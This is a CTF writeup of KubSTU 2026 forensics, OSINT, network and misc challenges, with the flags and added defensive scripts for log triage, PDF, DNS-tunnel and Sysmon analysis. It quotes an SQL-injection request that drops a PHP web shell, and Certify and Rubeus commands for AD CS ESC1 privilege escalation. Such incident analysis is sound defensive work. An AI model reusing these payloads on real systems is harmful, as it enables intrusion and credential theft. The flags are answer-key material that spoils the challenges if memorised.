KubSTU 2026 Writeup — Part 2: Forensics, OSINT, Network, Misc
This is the second KubSTU 2026 grouped writeup, covering the remaining categories: Forensics, OSINT, Network, and Misc.
Forensics
Demo
A security audit of a web and database server. Apache logs showed sqlmap from 192.168.1.100 hitting an SQL injection in index.php:
$id = $_GET['id'];                                            // untrusted input, no validation or casting
$sql = "SELECT title, content FROM articles WHERE id = $id";  // interpolated straight into the query
The attacker wrote a web shell via INTO OUTFILE:
GET /index.php?id=1 UNION SELECT 1,'<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/uploads/shell.php'
Then used the shell to read config.php, which contained the DB server's SSH credentials and a private key. The key matched /home/dbadmin/.ssh/authorized_keys on the DB host; auth.log confirmed the lateral move as dbadmin. Finally, .bash_history showed the exfiltration:
cp /var/lib/mysql/confidential_data.sql /tmp/.backup_data
Flag: KubSTU{SQLi,shell.php,dbadmin,confidential_data.sql}
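The same chain can be pulled out of an access log mechanically. The following is an added example (not code from the writeup or the challenge): a small Apache combined-log triage script that flags the sqlmap user agent, UNION SELECT probes, INTO OUTFILE/DUMPFILE writes under the web root, and later calls to a dropped PHP file under /uploads/. The log lines are constructed to mirror the incident, not the real capture; the web root and the /uploads/ path are assumptions taken from the shell path above.

```python
import re
from urllib.parse import unquote

WEBROOT = "/var/www/html/"   # assumed from the OUTFILE path seen in the incident

# Apache "combined" format; the target group keeps the raw, percent-encoded request path.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
UNION_RE = re.compile(r'\bunion\b.*?\bselect\b', re.I | re.S)
# INTO OUTFILE / INTO DUMPFILE with a quoted destination: the file-write primitive used here.
OUTFILE_RE = re.compile(r'\binto\s+(?:out|dump)file\s+[\'"]([^\'"]+)[\'"]', re.I)
# A PHP file under the upload directory invoked with a cmd= parameter.
SHELL_USE_RE = re.compile(r'^/uploads/[^?\s]+\.php\?(?:[^#]*&)?cmd=', re.I)

# Constructed log lines modelled on the incident (not the challenge's real access log).
SAMPLE_LOG = """\
192.168.1.100 - - [14/Feb/2026:10:01:02 +0300] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.100 - - [14/Feb/2026:10:01:05 +0300] "GET /index.php?id=1%27 HTTP/1.1" 500 0 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
192.168.1.100 - - [14/Feb/2026:10:01:09 +0300] "GET /index.php?id=1%20UNION%20SELECT%201,'x'%20INTO%20OUTFILE%20'/var/www/html/uploads/shell.php' HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
192.168.1.100 - - [14/Feb/2026:10:02:30 +0300] "GET /uploads/shell.php?cmd=cat%20config.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Feb/2026:10:03:00 +0300] "GET /index.php?id=2 HTTP/1.1" 200 480 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict of log fields plus the URL-decoded request target, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote(rec["target"])
    return rec


def classify(rec):
    """Tag one parsed record; also records the destination of any file write."""
    tags = []
    if "sqlmap" in rec["ua"].lower():
        tags.append("sqlmap-ua")
    q = rec["decoded"]
    if UNION_RE.search(q):
        tags.append("union-select")
    m = OUTFILE_RE.search(q)
    if m:
        tags.append("file-write")
        rec["written_path"] = m.group(1)
        if m.group(1).startswith(WEBROOT):
            tags.append("webroot-write")      # a write into the web root is a shell drop until proven otherwise
    if SHELL_USE_RE.search(q):
        tags.append("webshell-use")
    return tags


def triage(log_text):
    """Parse every line, keep the ones with at least one tag, in log order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rec["tags"] = classify(rec)
        if rec["tags"]:
            findings.append(rec)
    return findings


def attacker_ips(findings):
    return {f["ip"] for f in findings}


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["ts"], f["ip"], ",".join(f["tags"]), f["decoded"], f.get("written_path", ""))
```

Run against a real access log, the ordered findings give the timeline the flag asks for: injection technique, dropped file name, and the first request that used it.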
Vanilla Raw
Memory forensics on a tmpfs-backed artifact. The flag came from recovering unlinked file contents in a raw memory image.
Flag: KubSTU{m3m0ry_unl1nk3d_tmpfs_f0r3ns1cs}
Wirepass
A network capture themed around penguins and capybaras. The flag surfaced from flow analysis or embedded protocol data.
Flag: KubSTU{p1ngu1n_0p_k4p1b4r0v5k_f4ll5}
Is the report in English?
A PDF metadata and embedded-file challenge. Decoding the right PDF object stream and filtering for real KubSTU{...} strings among decoys gave the flag.
Flag: KubSTU{PDF_M3t4d4t4_F0r3ns1cs_4dv4nc3d_Ch4ll3ng3_2025_S3cur3_Emb3dd3d_F1l3_3ncrypt10n_Pr0t0c0l}
Mutant
Another PDF object-stream puzzle with decoy flags mixed into decompressed text-content streams. A direct regex for the real KubSTU{...} format picked out the genuine flag.
Flag: KubSTU{pdf_0bj3ct_m4st3r_v2}
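Both PDF challenges above ("Is the report in English?" and "Mutant") come down to the same two steps: inflate every FlateDecode stream, then apply a strict pattern for the flag format so decoys with the wrong case or with spaces fall out. The script below is an added example, not the writeup's own tooling; it builds a constructed PDF-like blob in memory (not a viewer-valid file) with decoys in the Info dictionary, a plain stream and a compressed stream, and reports every candidate together with where it was found. The stream regex is a triage heuristic, not a PDF parser.

```python
import re
import zlib

FLAG_RE = re.compile(rb'KubSTU\{[A-Za-z0-9_]+\}')   # strict: exact case, no whitespace inside
# Heuristic: a dictionary immediately followed by a stream body. Nested dictionaries or a binary
# body that happens to contain "endstream" can confuse it; fine for triage, not for parsing.
STREAM_RE = re.compile(rb'<<(?P<dict>.*?)>>\s*stream\r?\n(?P<body>.*?)\r?\nendstream', re.S)


def build_sample_pdf():
    """Constructed sample: one plain stream, one FlateDecode stream, decoys in /Info."""
    plain = b"BT (kubstu{lowercase_decoy}) Tj (KubSTU{not a flag}) Tj ET"
    hidden = zlib.compress(b"BT (KubSTU{decoy_in_stream}) Tj ET\n% KubSTU{real_flag_example}\n")
    return b"".join([
        b"%PDF-1.4\n",
        b"1 0 obj\n<< /Length %d >>\nstream\n" % len(plain) + plain + b"\nendstream\nendobj\n",
        b"2 0 obj\n<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(hidden)
        + hidden + b"\nendstream\nendobj\n",
        b"3 0 obj\n<< /Title (KubSTU{metadata_decoy}) /Producer (kubstu{x}) >>\nendobj\n",
        b"trailer\n<< /Info 3 0 R >>\n%%EOF\n",
    ])


def extract_streams(pdf):
    """Yield (index, body) for each stream; FlateDecode bodies are inflated, broken ones skipped."""
    out = []
    for i, m in enumerate(STREAM_RE.finditer(pdf)):
        body = m.group("body")
        if b"/FlateDecode" in m.group("dict"):
            try:
                body = zlib.decompress(body)
            except zlib.error:
                continue          # truncated stream or a filter chain this script does not handle
        out.append((i, body))
    return out


def find_flags(pdf):
    """Map each strict-format candidate to the set of places it was seen ('raw' or 'streamN')."""
    hits = {}
    for f in FLAG_RE.findall(pdf):                  # what `strings`/grep over the file would show
        hits.setdefault(f.decode(), set()).add("raw")
    for i, body in extract_streams(pdf):
        for f in FLAG_RE.findall(body):
            hits.setdefault(f.decode(), set()).add(f"stream{i}")
    return hits


def only_in_streams(hits):
    """Candidates that never appear in the raw bytes, i.e. invisible without inflating."""
    return sorted(f for f, where in hits.items() if "raw" not in where)


if __name__ == "__main__":
    hits = find_flags(build_sample_pdf())
    for flag, where in sorted(hits.items()):
        print(flag, sorted(where))
    print("hidden only:", only_in_streams(hits))
```

On a real file, replace `build_sample_pdf()` with `open(path, "rb").read()`; the decoy/real decision still needs an analyst (the constructed names are labelled for clarity), but the location column shows which candidates were planted in plain sight and which were sitting inside compressed content streams.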
Tunnel
DNS exfiltration over a hex-encoded tunnel. The attacker routed data through DNS queries; decoding the hex payload revealed the flag.
Flag: KubSTU{d0nt_tru5t_th3_dn5_qu3r135_v1a_h3x}
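Decoding this kind of tunnel is mostly bookkeeping: keep the queries to the exfil domain, in time order and per client, strip the domain suffix, keep the hex-looking labels and concatenate them before decoding. The script below is an added example (not from the writeup); its query log is constructed, and it also includes a detection-side helper that counts long hex labels per client and domain, which is how such a tunnel shows up in DNS logs before anyone decodes it. Treating "hex-looking" as "even-length and all hex digits" is a heuristic: short real labels such as "ad" or "cafe" also satisfy it.

```python
import re
from collections import defaultdict

HEX_LABEL = re.compile(r'^[0-9a-fA-F]+$')

# Constructed (time, client, qname) records modelled on the challenge; not its real capture.
SAMPLE_QUERIES = [
    ("10:00:01", "10.0.0.7", "cdn.example.com."),
    ("10:00:02", "10.0.0.7", "65786669.x.tunnel.example."),
    ("10:00:03", "10.0.0.7", "6C206465.x.tunnel.example."),   # upper-case hex must decode too
    ("10:00:04", "10.0.0.7", "ns1.tunnel.example."),          # legitimate name under the same zone
    ("10:00:05", "10.0.0.7", "6d6f206f.x.tunnel.example."),
    ("10:00:06", "10.0.0.7", "6b.x.tunnel.example."),         # short final chunk
    ("10:00:07", "10.0.0.9", "www.tunnel.example."),          # other client, no payload
]


def payload_labels(qname, suffix):
    """Hex labels carried in front of the tunnel suffix, in left-to-right order."""
    if not qname.lower().endswith(suffix.lower()):
        return []
    prefix = qname[:-len(suffix)]
    return [l for l in prefix.split(".") if l and len(l) % 2 == 0 and HEX_LABEL.match(l)]


def decode_tunnel(queries, suffix):
    """Reassemble the hex stream per client in time order and decode it to bytes."""
    chunks = defaultdict(list)
    for _ts, client, qname in sorted(queries):
        chunks[client].extend(payload_labels(qname, suffix))
    return {c: bytes.fromhex("".join(labels)) for c, labels in chunks.items() if labels}


def hex_heavy_domains(queries, min_labels=3):
    """Detection heuristic: count hex labels of 8+ chars per (client, registered domain)."""
    counts = defaultdict(int)
    for _ts, client, qname in queries:
        labels = [l for l in qname.rstrip(".").split(".") if l]
        domain = ".".join(labels[-2:])
        n_hex = sum(1 for l in labels[:-2] if len(l) >= 8 and HEX_LABEL.match(l))
        if n_hex:
            counts[(client, domain)] += n_hex
    return {k: v for k, v in counts.items() if v >= min_labels}


if __name__ == "__main__":
    print(hex_heavy_domains(SAMPLE_QUERIES))
    for client, data in decode_tunnel(SAMPLE_QUERIES, ".tunnel.example.").items():
        print(client, data)
```

Real tunnels usually prepend a sequence number to each label so chunks can be reordered after retransmission; when that is present, sort on it instead of relying on query timestamps.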
Ratte
A malware-forensics trace. After reversing the sample and following its behavior, the flag was extracted from command output or embedded strings.
Flag: KubSTU{n0_m0r3_gr3pp1ng_1n_th3_d4rk_v2}
We have an incident
The heaviest forensics challenge: two KAPE-style host collections (HR/ and AD/). The attack chain was reconstructed from Sysmon and PowerShell logs:
- Initial access: WINWORD.EXE opened Резюме.docm, which spawned a hidden PowerShell bootstrap.
- Privilege escalation: AD CS abuse via an ESC1-vulnerable template:
Certify.exe request /ca:DC1.kuban.loc\kuban-DC1-CA /template:VulnerableUserSAN /altname:admin
Rubeus.exe asktgt /user:admin /certificate:C:\Users\Public\admin.pfx /password: /nowrap /ptt
- Post-exploitation tools, in launch order: Резюме.docm → Certify.exe → Rubeus.exe → mimikatz.exe → wlmss.exe
- Exfiltration: 0-40e10000-admin@krbtgt~kuban.loc-KUBAN.LOC.kirbi (the exported TGT) and ntds.dit
Flag:
KubSTU{ESC1:Резюме.docm_Certify.exe_Rubeus.exe_mimikatz.exe_wlmss.exe:0-40e10000-admin@krbtgt~kuban.loc-KUBAN.LOC.kirbi_ntds.dit}
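The flag wants tools in launch order, and the cheapest reliable source for that is Sysmon Event ID 1 sorted by UtcTime with duplicates collapsed to first launch. The script below is an added example, not the writeup's own notes: its event records are constructed and deliberately shuffled, command lines are trimmed to what the ordering needs, and the Office-spawns-shell check is the generic detection that would have caught the initial access in the first place. Image and parent paths are assumptions.

```python
import re
from datetime import datetime

TS_FMT = "%Y-%m-%d %H:%M:%S.%f"          # Sysmon UtcTime layout
OFFICE = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOC_RE = re.compile(r'([^\\"\s]+\.docm)', re.I)
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
WORD = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"

# Constructed Sysmon Event ID 1 (process create) records, NOT in time order on purpose.
SAMPLE_EVENTS = [
    {"UtcTime": "2026-02-10 09:05:45.000", "ProcessId": 5100, "ParentProcessId": 4088,
     "Image": "C:\\Users\\Public\\mimikatz.exe", "ParentImage": PS, "CommandLine": "mimikatz.exe"},
    {"UtcTime": "2026-02-10 09:00:01.250", "ProcessId": 3012, "ParentProcessId": 1400,
     "Image": WORD, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": '"' + WORD + '" /n "C:\\Users\\hr\\Downloads\\Резюме.docm"'},
    {"UtcTime": "2026-02-10 09:06:20.500", "ProcessId": 5300, "ParentProcessId": 4088,
     "Image": "C:\\Users\\Public\\wlmss.exe", "ParentImage": PS, "CommandLine": "wlmss.exe"},
    {"UtcTime": "2026-02-10 09:00:07.800", "ProcessId": 4088, "ParentProcessId": 3012,
     "Image": PS, "ParentImage": WORD, "CommandLine": "powershell.exe -w hidden -enc <base64 redacted>"},
    {"UtcTime": "2026-02-10 09:03:10.100", "ProcessId": 4700, "ParentProcessId": 4088,
     "Image": "C:\\Users\\Public\\Rubeus.exe", "ParentImage": PS, "CommandLine": "Rubeus.exe asktgt <args trimmed>"},
    {"UtcTime": "2026-02-10 09:05:00.000", "ProcessId": 5000, "ParentProcessId": 4088,
     "Image": "C:\\Users\\Public\\mimikatz.exe", "ParentImage": PS, "CommandLine": "mimikatz.exe"},
    {"UtcTime": "2026-02-10 09:02:30.300", "ProcessId": 4500, "ParentProcessId": 4088,
     "Image": "C:\\Users\\Public\\Certify.exe", "ParentImage": PS, "CommandLine": "Certify.exe request <args trimmed>"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1]


def by_time(events):
    return sorted(events, key=lambda e: datetime.strptime(e["UtcTime"], TS_FMT))


def first_launches(events):
    """Image basename -> the earliest process-create event for it."""
    first = {}
    for ev in by_time(events):
        first.setdefault(basename(ev["Image"]), ev)
    return first


def launch_order(events, names):
    """The requested tools ordered by first launch; names not seen are dropped."""
    first = first_launches(events)
    return sorted((n for n in names if n in first),
                  key=lambda n: datetime.strptime(first[n]["UtcTime"], TS_FMT))


def opened_documents(events):
    """Macro-enabled documents passed on an Office process command line, in time order."""
    docs = []
    for ev in by_time(events):
        if basename(ev["Image"]).upper() in OFFICE:
            docs.extend(DOC_RE.findall(ev["CommandLine"]))
    return docs


def office_spawned_shells(events):
    """Detection: Office parent with a script/shell interpreter child."""
    hits = []
    for ev in by_time(events):
        parent, child = basename(ev["ParentImage"]).upper(), basename(ev["Image"]).lower()
        if parent in OFFICE and child in SHELLS:
            hits.append((ev["UtcTime"], parent, child, ev["CommandLine"]))
    return hits


if __name__ == "__main__":
    print(opened_documents(SAMPLE_EVENTS))
    print(launch_order(SAMPLE_EVENTS, ["wlmss.exe", "mimikatz.exe", "Rubeus.exe", "Certify.exe"]))
    for hit in office_spawned_shells(SAMPLE_EVENTS):
        print("office->shell:", hit)
```

Note that the order comes from timestamps, not from the order the names are asked for or the order records appear in the export; a second mimikatz run does not move it in the list. The same approach works on PowerShell 4104 script-block logs once the launching process is known.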
OSINT
City that doesn’t exist
A children’s themed park in a southern Russian mall: Minopolis in OZ Mall, Krasnodar, renamed to ZkidZ City in 2019. The operating legal entity was not the obvious ООО «ТПКО МИНОПОЛИС КРАСНОДАР» (already excluded from EGRUL before the park opened), but ООО «ДЕТСТВО+», INN 2312206762. The Rospatent trademark MINOPOLIS №723853 was filed on 20.12.2018.
Flag: KubSTU{2312206762_20.12.2018} (solved post-competition)
Morning without coordinates
A photo with “АВТОВОКЗАЛ” on the roof and a hilly background matched the Gelendzhik bus station. 2GIS/OSM gave the address: Геленджик, Объездная улица, 3.
Flag: KubSTU{Gelendzhik_Obyezdnaya_3}
Bad OpSec
A boarding-pass photo with a PDF417 barcode decoded to a standard IATA BCBP string:
M1PETLITSA/ALEKSEI IGOE93KTGB KRRSVXU6 0210 046Y017D0003 151>218 ...
- KRR → Krasnodar (departure)
- SVX → Yekaterinburg (arrival)
- U6 0210 → Ural Airlines flight U6210, 15 Feb 2026
- Scheduled arrival: 17:20
Flag: KubSTU{U6210_Yekaterinburg_17:20}
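The BCBP string is fixed-width, so the fields can be sliced without any library. The parser below is an added example (not from the writeup): it walks the 60-character mandatory block of an IATA BCBP "M" boarding pass, turns the Julian day into a calendar date, and flags a truncated variable-size field, which is exactly the situation with the "..." in the decoded string above. The sample is constructed with a placeholder passenger name but keeps the PNR, route, flight, day and seat layout from the decoded barcode; the year is not in the barcode at all (only the day of year is), so it is passed in from context.

```python
from datetime import date, timedelta

# Mandatory fields of the first leg of an IATA BCBP "M" string and their fixed widths.
FIELDS = [
    ("format_code", 1), ("legs", 1), ("passenger_name", 20), ("eticket", 1),
    ("pnr", 7), ("from_airport", 3), ("to_airport", 3), ("carrier", 3),
    ("flight_number", 5), ("julian_date", 3), ("compartment", 1), ("seat", 4),
    ("checkin_seq", 5), ("passenger_status", 1), ("variable_size_hex", 2),
]
MANDATORY_LEN = sum(w for _, w in FIELDS)   # 60 characters

# Constructed sample: placeholder name, the rest laid out like the decoded boarding pass.
# The variable-size field claims 0x51 = 81 characters but only ">218" follows (truncated).
SAMPLE_BCBP = (
    "M1" + "DOE/JOHN".ljust(20) + "E" + "93KTGB".ljust(7)
    + "KRR" + "SVX" + "U6".ljust(3) + "0210".ljust(5) + "046" + "Y" + "017D"
    + "0003".ljust(5) + "1" + "51" + ">218"
)


def parse_bcbp(data):
    """Slice the mandatory block into named fields; note whether the variable field is cut short."""
    if len(data) < MANDATORY_LEN or data[0] != "M":
        raise ValueError("not a BCBP 'M' string, or shorter than the mandatory block")
    rec, pos = {}, 0
    for name, width in FIELDS:
        rec[name] = data[pos:pos + width].strip()
        pos += width
    size = int(rec["variable_size_hex"] or "0", 16)
    rec["variable_field"] = data[pos:pos + size]
    rec["truncated"] = len(rec["variable_field"]) < size
    return rec


def flight_designator(rec):
    """Carrier code plus flight number without leading zeros, e.g. 'U6' + '0210' -> 'U6210'."""
    return rec["carrier"] + rec["flight_number"].lstrip("0")


def flight_date(rec, year):
    """Julian day-of-year to a calendar date; the year is not encoded and must come from context."""
    return date(year, 1, 1) + timedelta(days=int(rec["julian_date"]) - 1)


def summarize(rec, year):
    return {
        "route": f'{rec["from_airport"]}-{rec["to_airport"]}',
        "flight": flight_designator(rec),
        "date": flight_date(rec, year).isoformat(),
        "seat": rec["seat"],
        "pnr": rec["pnr"],
        "truncated": rec["truncated"],
    }


if __name__ == "__main__":
    print(summarize(parse_bcbp(SAMPLE_BCBP), 2026))
```

The mandatory block carries no clock times, so departure and arrival times such as the 17:20 in the flag come from the carrier's schedule for that flight and date, not from the barcode itself.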
Minute of fame
The flag was explicitly present in the challenge description.
Flag: KubSTU{TVChannelName_ReleaseDate}
Network
Nut legends
A Packet Tracer project gave a Cisco network topology: PC COOPER R. at 10.10.10.10/24, a router-on-a-stick Mastif_0828, and Server#1 at 10.20.20.100/24. The switch description on Fa0/10 was Linked_by_14mB4mb00zl3r. HTTP on the server hinted that a key was “archived in copyrights,” and copyrights.html contained kubstu(end_user_license_agreement) inside the Cisco EULA.
Using copyrights as a stego key, outguess extraction from the embedded JPEG blobs produced a 5625-byte second-stage artifact, but the blob did not identify as a known format and the challenge remained unsolved.
Status: UNSOLVED
Misc
Start
The welcome sanity check.
Flag: KubSTU{1ets_g0}
Mobile WAF
A service asked us to classify 100 HTTP requests as Block or Allow. The classification logic was author-specific rather than signature-based, with inconsistent endpoint-dependent rules. We reached 79/100 but could not fully reverse the black-box policy.
Flag: TBD
Takeaways
- Forensics: Timestamps matter. The order of process launches, not file creation or first network visibility, is what the flag format often asks for.
- Forensics: AD CS ESC1 abuse leaves clear artifacts (Certify.exe, Rubeus.exe, TGT export) when the host collection is complete.
- OSINT: The obvious legal entity is frequently a decoy. Always check EGRUL status dates and actual operator job postings.
- OSINT: IATA BCBP barcodes carry enough structured data to recover flight, city, and time without any external search.
- Network: When a challenge hands you a Packet Tracer topology and a single keyword (copyrights), treat it as a stego key and verify with a round-trip test before declaring extraction broken.